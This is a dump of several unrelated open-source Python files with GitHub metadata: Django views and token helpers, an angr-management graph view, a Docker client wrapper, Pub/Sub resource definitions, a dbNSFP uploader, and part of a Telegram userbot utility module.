| column | dtype | range |
|---|---|---|
| hexsha | string | length 40-40 |
| size | int64 | 4-1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4-209 |
| max_stars_repo_name | string | length 5-121 |
| max_stars_repo_head_hexsha | string | length 40-40 |
| max_stars_repo_licenses | list | length 1-10 |
| max_stars_count | int64 | 1-191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24-24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24-24, nullable |
| max_issues_repo_path | string | length 4-209 |
| max_issues_repo_name | string | length 5-121 |
| max_issues_repo_head_hexsha | string | length 40-40 |
| max_issues_repo_licenses | list | length 1-10 |
| max_issues_count | int64 | 1-67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24-24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24-24, nullable |
| max_forks_repo_path | string | length 4-209 |
| max_forks_repo_name | string | length 5-121 |
| max_forks_repo_head_hexsha | string | length 40-40 |
| max_forks_repo_licenses | list | length 1-10 |
| max_forks_count | int64 | 1-105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24-24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24-24, nullable |
| content | string | length 4-1.02M |
| avg_line_length | float64 | 1.07-66.1k |
| max_line_length | int64 | 4-266k |
| alphanum_fraction | float64 | 0.01-1 |
a522e9a12bc7c4dbb25eb2263a0c78b7c949de6b | size: 1,155 | ext: py | lang: Python
repo_path: noos_viewer/tokens.py | repo_name: rbins-swap-team/NoosDrift | repo_head_hexsha: 3aafa6002567f71ad42dc685fa4e5dd0b74007b2 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: 12 (2020-03-13T14:12:48.000Z to 2022-03-12T00:13:46.000Z) | max_forks_count: null
from noos_viewer.models import UserProfile
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils import six
class AccountActivationTokenGenerator(PasswordResetTokenGenerator):
# def _make_hash_value(self, profile, timestamp):
def _make_hash_value(self, user, timestamp):
profiles = UserProfile.objects.filter(user__pk=user.pk)
return (
# six.text_type(profile.user.pk) + six.text_type(timestamp) +
six.text_type(user.pk) + six.text_type(timestamp) +
six.text_type(profiles[0].email_confirmed)
# six.text_type(profile.email_confirmed)
)
# def _make_hash_value(self, user, timestamp):
# # Ensure results are consistent across DB backends
# login_timestamp = ''
# if user.last_login is None:
# else:
# user.last_login.replace(microsecond=0, tzinfo=None)
#
# return (
# six.text_type(user.pk) + user.password +
# six.text_type(login_timestamp) + six.text_type(timestamp)
# )
account_activation_token = AccountActivationTokenGenerator()
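A minimal usage sketch for the generator above (assumes a configured Django project and a saved `User` instance named `user`, neither of which is part of this file; note that `django.utils.six` was removed in Django 3.0, where plain `str` replaces `six.text_type`):

```python
# Sketch: issuing and verifying an account-activation token with the generator above.
from noos_viewer.tokens import account_activation_token

token = account_activation_token.make_token(user)       # embed in the activation e-mail link
assert account_activation_token.check_token(user, token)
# Flipping UserProfile.email_confirmed changes the hash built in _make_hash_value(),
# so tokens issued before confirmation stop validating afterwards.
```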
avg_line_length: 38.5 | max_line_length: 77 | alphanum_fraction: 0.664935
adcf80492ed80c423173c12c9fac9d028fe68342 | size: 9,708 | ext: py | lang: Python
repo_path: angrmanagement/ui/views/data_dep_view.py | repo_name: DennyDai/angr-management | repo_head_hexsha: 8a4ba5dafbf2f4d2ba558528a0d1ae099a199a04 | licenses: ["BSD-2-Clause"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
import logging
from typing import Optional, Dict, List, TYPE_CHECKING, Set
# noinspection PyPackageRequirements
from PySide2 import QtCore, QtWidgets, QtGui
# noinspection PyPackageRequirements
from networkx import DiGraph
from angr.analyses.data_dep import MemDepNode, RegDepNode, TmpDepNode
from .view import BaseView
from ..dialogs.data_dep_graph_search import QDataDepGraphSearch
from ..widgets.qdatadep_graph import QDataDepGraph
from ..widgets.qdatadepgraph_block import QDataDepGraphBlock
if TYPE_CHECKING:
from angr.analyses.data_dep import BaseDepNode
from angr.analyses import DataDependencyGraphAnalysis
from angr import SimState
from capstone import CsInsn
_l = logging.getLogger(__name__)
class DataDepView(BaseView):
"""Workspace view used to display a data dependency graph on the screen"""
@property
def function(self):
raise NotImplementedError("Does not apply!")
FUNCTION_SPECIFIC_VIEW = False
def __init__(self, workspace, default_docking_position, *args, **kwargs):
super().__init__('data_dependency', workspace, default_docking_position, *args, **kwargs)
self.base_caption = 'Data Dependency'
self.workspace = workspace
# Get all instructions in the program
self._instructions: Dict[int, 'CsInsn'] = {}
inst = self.workspace.instance
for _, func in inst.kb.functions.items():
for block in func.blocks:
disass = block.disassembly
for ins in disass.insns:
self._instructions[ins.address] = ins
self._end_state: Optional['SimState'] = None
self._start_addr: Optional[int] = None
self._end_addr: Optional[int] = None
self._block_addrs: Optional[List[int]] = None
# UI widgets
self._graph_widget: Optional[QDataDepGraph] = None
# Data
self._data_dep: Optional['DataDependencyGraphAnalysis'] = None
self._ddg: Optional['DiGraph'] = None # Derived from analysis, can be full, simplified, or subgraph
self._graph: Optional['DiGraph'] = None
self._traced_ancestors: Set[QDataDepGraphBlock] = set()
self._traced_descendants: Set[QDataDepGraphBlock] = set()
self._init_widgets()
self._register_events()
@property
def _data_dep_graph(self) -> Optional['DiGraph']:
return self._ddg
@_data_dep_graph.setter
def _data_dep_graph(self, new_ddg: 'DiGraph'):
self._ddg = new_ddg
self._graph_widget.ref_graph = new_ddg
@property
def traced_ancestors(self) -> Set[QDataDepGraphBlock]:
return self._traced_ancestors
def update_ancestors(self, block: QDataDepGraphBlock):
self._traced_descendants.clear()
self._traced_ancestors = self._graph_widget.get_ancestors(block)
self.redraw_graph()
@property
def traced_descendants(self) -> Set[QDataDepGraphBlock]:
return self._traced_descendants
def update_descendants(self, block: QDataDepGraphBlock):
self._traced_ancestors.clear()
self._traced_descendants = self._graph_widget.get_descendants(block)
self.redraw_graph()
@property
def graph_widget(self) -> Optional['QDataDepGraph']:
return self._graph_widget
@property
def analysis_params(self) -> dict:
return {
'end_state': self._end_state,
'start_addr': self._start_addr,
'end_addr': self._end_addr,
'block_addrs': self._block_addrs
}
@analysis_params.setter
def analysis_params(self, new_params: dict):
if new_params == self.analysis_params:
# Nothing new, no need to rerun analysis
return
try:
self._end_state = new_params['end_state']
self._start_addr = new_params['start_addr']
self._end_addr = new_params['end_addr']
self._block_addrs = new_params['block_addrs']
self.run_analysis()
except OSError:
pass
# except KeyError:
# _l.error("Unable to generate data dependency graph with provided parameters!")
def run_analysis(self):
inst = self.workspace.instance
data_dep: 'DataDependencyGraphAnalysis' = inst.project.analyses.DataDep(
self._end_state,
self._start_addr,
self._end_addr,
self._block_addrs,
)
self._data_dep = data_dep
self._data_dep_graph = data_dep.graph
self.reload()
def hover_enter_block(self, block: QDataDepGraphBlock, modifiers: QtCore.Qt.KeyboardModifierMask):
# If the user is holding down 'Control' while hovering, should show descendants instead
if modifiers & QtCore.Qt.ControlModifier:
self._traced_descendants = self._graph_widget.get_descendants(block)
else:
self._traced_ancestors = self._graph_widget.get_ancestors(block)
# if self._graph_widget is not None:
# self._graph_widget.on_block_hovered(block)
self.redraw_graph()
def hover_leave_block(self):
self._traced_ancestors.clear()
self._traced_descendants.clear()
self.redraw_graph()
def on_screen_changed(self):
if self._graph_widget is not None:
self._graph_widget.refresh()
def reload(self):
if self._graph_widget is None:
return
# Re-Generate the graph
if not self._data_dep:
self._graph = None
self._graph_widget.graph = None
self._graph_widget.request_relayout()
return
self._graph = self._create_ui_graph()
self._graph_widget.graph = self._graph
def redraw_graph(self):
if self._graph_widget.graph is not None:
self._graph_widget.viewport().update()
def sizeHint(self):
return QtCore.QSize(400, 800)
def _init_widgets(self):
self._graph_widget = QDataDepGraph(self.workspace, self, self)
h_layout = QtWidgets.QHBoxLayout(self)
h_layout.addWidget(self._graph_widget)
h_layout.setContentsMargins(0, 0, 0, 0)
def _register_events(self):
self.workspace.current_screen.am_subscribe(self.on_screen_changed)
def _convert_node(self, node: 'BaseDepNode',
converted: Dict['BaseDepNode', QDataDepGraphBlock]) -> Optional[QDataDepGraphBlock]:
if isinstance(node, (MemDepNode, RegDepNode)):
cs_instr = self._instructions.get(node.ins_addr, None)
if cs_instr:
instr = cs_instr.insn
else:
instr = None
else:
instr = None
return converted.setdefault(node, QDataDepGraphBlock(False, self, node, instr))
def _create_ui_graph(self) -> DiGraph:
g = DiGraph()
converted = {}
for dep_node in self._data_dep_graph.nodes():
node = self._convert_node(dep_node, converted)
if node:
g.add_node(node)
for n0, n1 in self._data_dep_graph.edges():
n0_ = self._convert_node(n0, converted)
n1_ = self._convert_node(n1, converted)
g.add_edge(n0_, n1_)
return g
def _graph_has_tmp_nodes(self) -> bool:
"""
Returns whether or not the given graph has temp nodes
"""
if not self._data_dep_graph:
return False
return any(node for node in self._data_dep_graph.nodes if isinstance(node, TmpDepNode))
def use_subgraph(self, block: QDataDepGraphBlock, backwards: bool):
dep_node = block.node
# Determine if any temp nodes exist in the graph and, if so, include them in subgraph
self._data_dep_graph = self._data_dep.get_data_dep(dep_node, self._graph_has_tmp_nodes(), backwards)
self.reload()
def _toggle_graph(self):
"""Switches the current graph being shown between the full and simplified graph"""
if self._data_dep_graph is self._data_dep.simplified_graph:
self._data_dep_graph = self._data_dep.graph
elif self._data_dep_graph is self._data_dep.sub_graph:
self._data_dep_graph = self._data_dep.graph if self._graph_has_tmp_nodes() \
else self._data_dep.simplified_graph
else:
self._data_dep_graph = self._data_dep.simplified_graph
self.reload()
#
# Events
#
def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
"""
Allow for searching for a node
"""
key = event.key()
modifiers = event.modifiers()
if key == QtCore.Qt.Key_F and modifiers & QtCore.Qt.ControlModifier:
# User would like to search
search_dialog = QDataDepGraphSearch(self, self.graph_widget)
search_dialog.setModal(False)
search_dialog.show()
else:
super().keyPressEvent(event)
def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:
button = event.button()
if button == QtCore.Qt.RightButton and event:
options_menu = QtWidgets.QMenu("Options", self)
if self._data_dep_graph is self._data_dep.graph:
toggle_text = 'Hide temp nodes'
elif self._data_dep_graph is self._data_dep.simplified_graph:
toggle_text = 'Show temp nodes'
else:
toggle_text = 'Untrack node'
options_menu.addAction(toggle_text, self._toggle_graph)
# Open options menu
options_menu.exec_(self.mapToGlobal(event.pos()))
else:
super().mousePressEvent(event)
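`_create_ui_graph` and `_convert_node` above map each analysis node to a UI block exactly once (via a memo dict) and then mirror the edges. A self-contained sketch of that conversion pattern, with plain strings standing in for dependency nodes and UI blocks (hypothetical data, networkx only):

```python
import networkx as nx

def convert_node(node, converted):
    # memoised conversion: each source node maps to exactly one "UI" object
    return converted.setdefault(node, f"block:{node}")

src = nx.DiGraph()
src.add_edges_from([("rax", "mem[0x1000]"), ("tmp_3", "mem[0x1000]")])

ui, converted = nx.DiGraph(), {}
for n in src.nodes():
    ui.add_node(convert_node(n, converted))
for a, b in src.edges():
    ui.add_edge(convert_node(a, converted), convert_node(b, converted))

print(sorted(ui.edges()))
# [('block:rax', 'block:mem[0x1000]'), ('block:tmp_3', 'block:mem[0x1000]')]
```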
avg_line_length: 34.920863 | max_line_length: 108 | alphanum_fraction: 0.649052
5d5fe2af14f2c09007f951ab42412797ce250ac1 | size: 3,720 | ext: py | lang: Python
repo_path: python/nvidia_deepops/docker/client/dockerpy.py | repo_name: samcmill/ngc-container-replicator | repo_head_hexsha: b5502076c78bb2904f2e57681c8b5a86285b4c45 | licenses: ["BSD-3-Clause"]
max_stars_count: 20 (2019-02-01T18:22:47.000Z to 2022-02-09T07:35:48.000Z) | max_issues_count: 10 (2019-06-03T19:25:17.000Z to 2022-01-11T03:56:38.000Z) | max_forks_count: 8 (2019-05-10T14:43:26.000Z to 2021-06-28T20:53:19.000Z)
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import docker
from nvidia_deepops import utils
from nvidia_deepops.docker.client.base import BaseClient
__all__ = ('DockerPy',)
log = utils.get_logger(__name__, level=logging.INFO)
class DockerPy(BaseClient):
def __init__(self):
self.client = docker.from_env(timeout=600)
def login(self, *, username, password, registry):
self.client.login(username=username,
password=password, registry=registry)
def get(self, *, url):
try:
return self.client.images.get(url)
except docker.errors.ImageNotFound:
return None
def pull(self, url):
log.debug("docker pull %s" % url)
self.client.images.pull(url)
def push(self, url):
log.debug("docker push %s" % url)
self.client.images.push(url)
def tag(self, src_url, dst_url):
log.debug("docker tag %s --> %s" % (src_url, dst_url))
image = self.client.images.get(src_url)
image.tag(dst_url)
def remove(self, url):
log.debug("docker rmi %s" % url)
self.client.images.remove(url)
def url2filename(self, url):
return "docker_image_{}.tar".format(url).replace("/", "%%")
def filename2url(self, filename):
return os.path.basename(filename).replace("docker_image_", "")\
.replace(".tar", "").replace("%%", "/")
def save(self, url, path=None):
filename = self.url2filename(url)
if path:
filename = os.path.join(path, filename)
log.debug("saving %s --> %s" % (url, filename))
image = self.client.api.get_image(url)
with open(filename, "wb") as tarfile:
tarfile.write(image.data)
return filename
def load(self, filename):
log.debug("loading image from %s" % filename)
with open(filename, "rb") as file:
self.client.images.load(file)
basename = os.path.basename(filename)
if basename.startswith("docker_image_"):
url = self.filename2url(filename)
log.debug("expected url from %s is %s" % (filename, url))
return url
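`url2filename` and `filename2url` above are pure string transforms, so their round-trip behaviour can be checked without a Docker daemon. A small sketch using standalone copies of the two helpers and an example image URL (illustrative, not taken from this file):

```python
import os

def url2filename(url):
    return "docker_image_{}.tar".format(url).replace("/", "%%")

def filename2url(filename):
    return (os.path.basename(filename)
            .replace("docker_image_", "").replace(".tar", "").replace("%%", "/"))

url = "nvcr.io/nvidia/pytorch:21.07-py3"
filename = url2filename(url)
print(filename)  # docker_image_nvcr.io%%nvidia%%pytorch:21.07-py3.tar
assert filename2url(filename) == url
```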
avg_line_length: 36.470588 | max_line_length: 73 | alphanum_fraction: 0.674462
87a99a3cde8e0dd1e46d641da481783211ec5197 | size: 6,076 | ext: py | lang: Python
repo_path: profiles/views.py | repo_name: magbanum/octoprofile | repo_head_hexsha: 07457a7273201c4009a402f6f1b818f1bb94b4e1 | licenses: ["MIT"]
max_stars_count: 8 (2021-07-03T12:59:29.000Z to 2022-01-20T13:51:05.000Z) | max_issues_count: null | max_forks_count: 1 (2022-02-07T17:49:37.000Z to 2022-02-07T17:49:37.000Z)
from django.http.response import JsonResponse
from django.shortcuts import render
from requests.api import request
from rest_framework.views import APIView
from rest_framework.response import Response
from .forms import UsernameForm
import requests
import json
import os
def home(request):
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
def joined_date(date):
    months = {'01': 'January', '02': 'February', '03': 'March', '04': 'April', '05': 'May', '06': 'June',
              '07': 'July', '08': 'August', '09': 'September', '10': 'October', '11': 'November', '12': 'December'}
# print(date)
year = date[:4]
month = months[date[5:7]]
day = date[8:10]
return month+' '+day+', '+year
def get_username(request):
    # if this is a GET request (the search form submits via GET) we need to process the form data
if request.method == 'GET':
# create a form instance and populate it with data from the request:
form = UsernameForm(request.GET)
# print(form.cleaned_data['username'])
# check whether it's valid:
if form.is_valid():
# Process the data in form.cleaned_data as required
headers = {
"Authorization": os.getenv('GITHUB_ACCESS_TOKEN')
}
# To get the User data and store in userdata
url1 = "https://api.github.com/users/{}".format(
form.cleaned_data['username'])
response = requests.get(url1, headers=headers)
userdata = response.json()
# print(userdata)
# print(userdata)
# If response contains 'message' in it then the username is invalid. Return the error message.
if 'message' in userdata.keys():
form = UsernameForm(request.GET)
note = "I can't find your Octoprofile.😟"
return render(request, 'profiles/home.html', {'form': form, 'note': note})
userdata['created_at'] = joined_date(userdata['created_at'])
# To get the Repositories data and store in repodata
url2 = "https://api.github.com/users/{}/repos".format(
form.cleaned_data['username'])
response = requests.get(url2, headers=headers)
repodata = response.json()
# To use repodata in another function
request.session['repodata'] = repodata
# Opening JSON file
data = open('./profiles/static/json/colors.json',)
# Returns JSON object as a dictionary
colors = json.load(data)
# print(colors['Python']['color'])
data.close()
return render(request, 'profiles/profile_page.html', {'userdata': userdata, 'repodata': repodata, 'colors': colors})
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
    # For any other method we'll create a blank form
form = UsernameForm()
return render(request, 'profiles/home.html', {'form': form})
def get_repodata(request):
# Collect the saved data from function get_username()
repodata = request.session.get('repodata')
data = open('./profiles/static/json/colors.json')
# Load json dictionary in colors
colors = json.load(data)
data.close()
# To get Top languages by user
top_lang = {}
for item in repodata:
# print(item['name'], item['language'])
top_lang[item['language']] = top_lang.get(item['language'], 0) + 1
sorted_top_lang = list(
sorted(top_lang.items(), key=lambda item: item[1], reverse=True))
# sliced the list to get top 5 items
sorted_top_lang = dict(sorted_top_lang[0:5])
# change 'null' key to 'Others'
    if None in sorted_top_lang:
        sorted_top_lang['Others'] = sorted_top_lang.pop(None)
# print(top_lang)
# print(sorted_top_lang)
# To get Most starred repositories
most_starred = {}
for item in repodata:
# print(item['name'], item['stargazers_count'])
most_starred[item['name']] = item['stargazers_count']
sorted_most_starred = list(
sorted(most_starred.items(), key=lambda item: item[1], reverse=True))
# sliced the list to get top 5 items
sorted_most_starred = dict(sorted_most_starred[0:5])
# print(sorted_most_starred)
# To get stars per languages
star_per_lang = {}
for item in repodata:
star_per_lang[item['language']] = star_per_lang.get(
item['language'], 0) + item['stargazers_count']
# print(star_per_lang)
# change 'null' key to 'Others'
    if None in star_per_lang:
        star_per_lang['Others'] = star_per_lang.pop(None)
return sorted_top_lang, sorted_most_starred, star_per_lang, colors
# To create API endpoints for top 5 languages
class TopLanguages(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[0]
colors_data = get_repodata(request)[3]
colors = [colors_data[key]["color"] for key in data.keys()]
chart_data = {
"labels": data.keys(),
"values": data.values(),
"colors": colors,
}
return Response(chart_data)
# To create API endpoints for top 5 most starred repos
class MostStarred(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[1]
chart_data = {
"labels": data.keys(),
"values": data.values(),
}
return Response(chart_data)
# To create API endpoints for stars per languages
class StarsPerLanguages(APIView):
authentication_classes = []
permission_classes = []
def get(self, request):
data = get_repodata(request)[2]
colors_data = get_repodata(request)[3]
colors = [colors_data[key]["color"] for key in data.keys()]
chart_data = {
"labels": data.keys(),
"values": data.values(),
"colors": colors,
}
return Response(chart_data)
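The per-language tally inside `get_repodata` is a plain dictionary count over the repository list, followed by sorting and truncation to five entries. A self-contained sketch of that aggregation on hypothetical `repodata`:

```python
# Hypothetical repodata entries (only the fields the aggregation uses)
repodata = [
    {"name": "octoprofile", "language": "Python", "stargazers_count": 8},
    {"name": "dotfiles", "language": "Shell", "stargazers_count": 2},
    {"name": "scraper", "language": "Python", "stargazers_count": 5},
    {"name": "notes", "language": None, "stargazers_count": 0},
]

top_lang = {}
for item in repodata:
    top_lang[item["language"]] = top_lang.get(item["language"], 0) + 1

top_lang = dict(sorted(top_lang.items(), key=lambda kv: kv[1], reverse=True)[:5])
if None in top_lang:                      # repos without a detected language
    top_lang["Others"] = top_lang.pop(None)

print(top_lang)  # {'Python': 2, 'Shell': 1, 'Others': 1}
```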
avg_line_length: 34.522727 | max_line_length: 128 | alphanum_fraction: 0.612739
fccbefa73a76f757e43c909ac3bd97c43ede9cdf | size: 2,047 | ext: py | lang: Python
repo_path: lib/googlecloudsdk/third_party/apis/pubsub/v1/resources.py | repo_name: google-cloud-sdk-unofficial/google-cloud-sdk | repo_head_hexsha: 2a48a04df14be46c8745050f98768e30474a1aac | licenses: ["Apache-2.0"]
max_stars_count: 2 (2019-11-10T09:17:07.000Z to 2019-12-18T13:44:08.000Z) | max_issues_count: null | max_forks_count: 1 (2020-07-25T01:40:19.000Z to 2020-07-25T01:40:19.000Z)
# -*- coding: utf-8 -*- #
# Copyright 2015 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Resource definitions for cloud platform apis."""
import enum
BASE_URL = 'https://pubsub.googleapis.com/v1/'
DOCS_URL = 'https://cloud.google.com/pubsub/docs'
class Collections(enum.Enum):
"""Collections for all supported apis."""
PROJECTS = (
'projects',
'projects/{projectsId}',
{},
['projectsId'],
True
)
PROJECTS_SCHEMAS = (
'projects.schemas',
'{+name}',
{
'':
'projects/{projectsId}/schemas/{schemasId}',
},
['name'],
True
)
PROJECTS_SNAPSHOTS = (
'projects.snapshots',
'{+snapshot}',
{
'':
'projects/{projectsId}/snapshots/{snapshotsId}',
},
['snapshot'],
True
)
PROJECTS_SUBSCRIPTIONS = (
'projects.subscriptions',
'{+subscription}',
{
'':
'projects/{projectsId}/subscriptions/{subscriptionsId}',
},
['subscription'],
True
)
PROJECTS_TOPICS = (
'projects.topics',
'{+topic}',
{
'':
'projects/{projectsId}/topics/{topicsId}',
},
['topic'],
True
)
def __init__(self, collection_name, path, flat_paths, params,
enable_uri_parsing):
self.collection_name = collection_name
self.path = path
self.flat_paths = flat_paths
self.params = params
self.enable_uri_parsing = enable_uri_parsing
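Each `Collections` member pairs a collection name with a URI path template. A small sketch of how such a template expands against `BASE_URL`, using hypothetical identifiers:

```python
BASE_URL = 'https://pubsub.googleapis.com/v1/'

# flat path for projects.topics, as listed in the enum above
template = 'projects/{projectsId}/topics/{topicsId}'

# illustrative IDs only
url = BASE_URL + template.format(projectsId='my-project', topicsId='my-topic')
print(url)  # https://pubsub.googleapis.com/v1/projects/my-project/topics/my-topic
```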
avg_line_length: 24.963415 | max_line_length: 74 | alphanum_fraction: 0.60723
b659370eb294cb3c965fe596994d80dd666be395 | size: 1,544 | ext: py | lang: Python
repo_path: src/hub/dataload/sources/dbnsfp/dbnsfp_upload.py | repo_name: erikyao/myvariant.info | repo_head_hexsha: a4eaaca7ab6c069199f8942d5afae2dece908147 | licenses: ["Apache-2.0"]
max_stars_count: 39 (2017-07-01T22:34:39.000Z to 2022-03-15T22:25:59.000Z) | max_issues_count: 105 (2017-06-28T17:26:06.000Z to 2022-03-17T17:49:53.000Z) | max_forks_count: 14 (2017-06-12T18:29:36.000Z to 2021-03-18T15:51:27.000Z)
import os
import glob
from .dbnsfp_mapping import mapping
from .dbnsfp_parser import load_data_file as load_common
import biothings.hub.dataload.uploader as uploader
from hub.dataload.uploader import SnpeffPostUpdateUploader
from hub.dataload.storage import MyVariantIgnoreDuplicatedStorage
SRC_META = {
"url": "https://sites.google.com/site/jpopgen/dbNSFP",
"license_url": "https://sites.google.com/site/jpopgen/dbNSFP",
"license_url_short": "http://bit.ly/2VLnQBz"
}
class DBNSFPBaseUploader(uploader.ParallelizedSourceUploader,
SnpeffPostUpdateUploader):
storage_class = MyVariantIgnoreDuplicatedStorage
GLOB_PATTERN = "dbNSFP*_variant.chr*"
@classmethod
def get_mapping(klass):
return mapping
def jobs(self):
        # tuples of (input_file, version), where version is either hg38 or hg19
return map(lambda e: (e, self.__class__.__metadata__["assembly"]),
glob.glob(os.path.join(self.data_folder, self.__class__.GLOB_PATTERN)))
def load_data(self, input_file, hg):
self.logger.debug("loading file " + input_file)
return load_common(input_file, version=hg)
class DBNSFPHG38Uploader(DBNSFPBaseUploader):
name = "dbnsfp_hg38"
main_source = "dbnsfp"
__metadata__ = {
"assembly": "hg38",
"src_meta": SRC_META
}
class DBNSFPHG19Uploader(DBNSFPBaseUploader):
name = "dbnsfp_hg19"
main_source = "dbnsfp"
__metadata__ = {
"assembly": "hg19",
"src_meta": SRC_META
}
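`jobs()` pairs every file matched by `GLOB_PATTERN` with the uploader's assembly so the parallelized uploader can dispatch one job per chromosome file. A sketch of that pairing, with hypothetical file names in place of a real data folder:

```python
# Hypothetical matches for the glob pattern "dbNSFP*_variant.chr*"
matched_files = [
    "dbNSFP4.1a_variant.chr1",
    "dbNSFP4.1a_variant.chr2",
    "dbNSFP4.1a_variant.chrX",
]
assembly = "hg38"  # would come from __metadata__["assembly"] on the uploader class

jobs = [(path, assembly) for path in matched_files]
print(jobs[0])  # ('dbNSFP4.1a_variant.chr1', 'hg38')
```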
avg_line_length: 28.592593 | max_line_length: 90 | alphanum_fraction: 0.698187
53a97d0092c399a8bd2fc40d2c55f130b7ed16d0 | size: 15,168 | ext: py | lang: Python
repo_path: tronx/helpers/utilities.py | repo_name: JayPatel1314/Tron | repo_head_hexsha: d8f2d799eea344c0d76f0fe758ce385c7ceceea7 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
import re
import os
import time
import html
import math
import json
import shlex
import random
import asyncio
import aiohttp
from hachoir.metadata import extractMetadata
from hachoir.parser import createParser
from PIL import Image
from typing import List
from re import escape, sub
from pyrogram.types import Message, User, InlineKeyboardButton
from pyrogram.errors import MessageNotModified, FloodWait
class Types(object):
TEXT = 1
DOCUMENT = 2
PHOTO = 3
VIDEO = 4
STICKER = 5
AUDIO = 6
VOICE = 7
VIDEO_NOTE = 8
ANIMATION = 9
ANIMATED_STICKER = 10
CONTACT = 11
class AioHttp(Types):
@staticmethod
async def get_json(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.json()
@staticmethod
async def get_text(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.text()
@staticmethod
async def get_json_from_text(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
text = await resp.text()
return json.loads(text)
@staticmethod
async def get_raw(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return await resp.read()
@staticmethod
async def get_url(link):
async with aiohttp.ClientSession() as session:
async with session.get(link) as resp:
return resp.url
class Utilities(AioHttp):
def HelpDex(self, page_number, loaded_modules, prefix):
rows = 4
column = 2
help_modules = []
for mod in loaded_modules:
if not mod.startswith("_"):
help_modules.append(mod)
help_modules = sorted(help_modules)
modules = [
InlineKeyboardButton(
text="{} {}".format(
self.HelpEmoji(),
x.replace("_", " ").title(),
),
callback_data="modulelist_{}|{}".format(x, page_number),
)
for x in help_modules
]
twins = list(zip(modules[::column], modules[1::column]))
if len(modules) % column == 1:
twins.append((modules[-1],))
num_pages = math.ceil(len(twins) / rows)
mod_page = page_number % num_pages
if len(twins) > rows:
twins = twins[
mod_page * rows : rows * (mod_page + 1)
] + [
(
InlineKeyboardButton(
text="❰ Prev",
callback_data="{}_prev({})".format(
prefix, mod_page
),
),
InlineKeyboardButton(text="Back", callback_data=f"open-start-dex"),
InlineKeyboardButton(
text="Next ❱",
callback_data="{}_next({})".format(
prefix, mod_page
),
),
)
]
return twins
def GetMessageType(self, msg, include_text=True):
content = None
message_type = None
if include_text is True:
if msg.text or msg.caption:
content = None
message_type = Types.TEXT
elif msg.sticker:
content = msg.sticker.file_id
message_type = Types.STICKER
elif msg.document:
if msg.document.mime_type == "application/x-bad-tgsticker":
message_type = Types.ANIMATED_STICKER
else:
message_type = Types.DOCUMENT
content = msg.document.file_id
elif msg.photo:
content = msg.photo.file_id # last elem = best quality
message_type = Types.PHOTO
elif msg.audio:
content = msg.audio.file_id
message_type = Types.AUDIO
elif msg.voice:
content = msg.voice.file_id
message_type = Types.VOICE
elif msg.video:
content = msg.video.file_id
message_type = Types.VIDEO
elif msg.video_note:
content = msg.video_note.file_id
message_type = Types.VIDEO_NOTE
elif msg.animation:
content = msg.animation.file_id
message_type = Types.ANIMATION
return content, message_type
def GetNoteType(self, msg):
reply = msg.reply_to_message
note_name = None
message_type = None
content = None
text = None
file_id = None
if self.long(msg) <= 1:
return None, None, None, None, None
if msg.text:
raw_text = msg.text.markdown
else:
raw_text = msg.caption.markdown
note_name = raw_text.split()[1]
# determine what the contents of the filter are - text, image, sticker, etc
if self.long(msg) >= 3:
text = raw_text.split(None, 2)[2]
message_type = Types.TEXT
elif reply:
if reply.text:
text = reply.text.markdown if reply.text else reply.caption.markdown if reply.caption else ""
message_type = Types.TEXT
content, message_type = self.GetMessageType(reply, include_text=False)
else:
return
return note_name, text, message_type, content
def FetchNoteType(self, msg):
message_type = None
content = None
note_name = None
